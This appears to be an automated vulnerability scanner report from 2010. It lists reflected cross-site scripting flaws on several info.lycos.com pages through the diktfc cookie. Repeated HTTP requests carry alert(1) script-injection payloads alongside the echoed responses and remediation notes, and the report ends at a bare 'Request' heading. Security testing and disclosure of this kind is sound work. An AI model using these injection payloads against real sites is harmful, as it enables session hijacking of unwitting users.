GET /privacy.php HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8ad88"%3balert(1)//e21d1919c06; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:14 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 54341
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Lyco ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/privacy.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8ad88";alert(1)//e21d1919c06.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 190dd"%3balert(1)//7b5dcd82c26 was submitted in the diktfc cookie. This input was echoed as 190dd";alert(1)//7b5dcd82c26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy/privacy.asp HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A190dd"%3balert(1)//7b5dcd82c26; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:33 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 54341
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Lyco ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/privacy.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A190dd";alert(1)//7b5dcd82c26.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0ccb"><script>alert(1)</script>3bab4915179 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /privacy/privacy.asp HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa0ccb"><script>alert(1)</script>3bab4915179; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:32 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:32 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 54371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Lyco ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/privacy.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa0ccb"><script>alert(1)</script>3bab4915179.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dea5e"%3balert(1)//10d048cbf08 was submitted in the diktfc cookie. This input was echoed as dea5e";alert(1)//10d048cbf08 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /safety.php HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adea5e"%3balert(1)//10d048cbf08; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:08 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:08 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17692
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Inte ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/safety.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adea5e";alert(1)//10d048cbf08.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79c2f"><script>alert(1)</script>32286124176 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /safety.php HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A79c2f"><script>alert(1)</script>32286124176; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:08 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:08 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17722
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Inte ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/safety.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A79c2f"><script>alert(1)</script>32286124176.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ab42"%3balert(1)//34b92340f39 was submitted in the diktfc cookie. This input was echoed as 1ab42";alert(1)//34b92340f39 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tos-mail.php HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1ab42"%3balert(1)//34b92340f39; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:13 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29798
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Lyco ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/tos-mail.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1ab42";alert(1)//34b92340f39.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8e0f"><script>alert(1)</script>4ca13e64715 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /tos-mail.php HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac8e0f"><script>alert(1)</script>4ca13e64715; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:13 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29828
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Lyco ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/tos-mail.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac8e0f"><script>alert(1)</script>4ca13e64715.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2aec"%3balert(1)//4b5345f7ccc was submitted in the diktfc cookie. This input was echoed as b2aec";alert(1)//4b5345f7ccc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tos-po.php HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab2aec"%3balert(1)//4b5345f7ccc; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:15 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:15 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29423
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Gene ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/tos-po.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab2aec";alert(1)//4b5345f7ccc.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7d9f"><script>alert(1)</script>c04828e62ab was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /tos-po.php HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af7d9f"><script>alert(1)</script>c04828e62ab; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:15 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:15 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Gene ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/tos-po.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af7d9f"><script>alert(1)</script>c04828e62ab.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28f28"%3balert(1)//65e76e87880 was submitted in the diktfc cookie. This input was echoed as 28f28";alert(1)//65e76e87880 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tos-subs.php HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A28f28"%3balert(1)//65e76e87880; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:24 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 54275
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Subs ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/tos-subs.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A28f28";alert(1)//65e76e87880.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8c1"><script>alert(1)</script>eb4451887f8 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /tos-subs.php HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c8c1"><script>alert(1)</script>eb4451887f8; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:23 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:23 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 54305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Subs ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/tos-subs.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c8c1"><script>alert(1)</script>eb4451887f8.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbdeb"><script>alert(1)</script>02352f01be0 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /tos-tm.php HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abbdeb"><script>alert(1)</script>02352f01be0; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:13 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22316
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Lyco ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/tos-tm.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abbdeb"><script>alert(1)</script>02352f01be0.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b7e6"%3balert(1)//12235f6b35c was submitted in the diktfc cookie. This input was echoed as 3b7e6";alert(1)//12235f6b35c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tos-tm.php HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b7e6"%3balert(1)//12235f6b35c; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:14 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22286
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Lyco ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/tos-tm.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b7e6";alert(1)//12235f6b35c.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f772"%3balert(1)//8a55a70c6c9 was submitted in the diktfc cookie. This input was echoed as 3f772";alert(1)//8a55a70c6c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
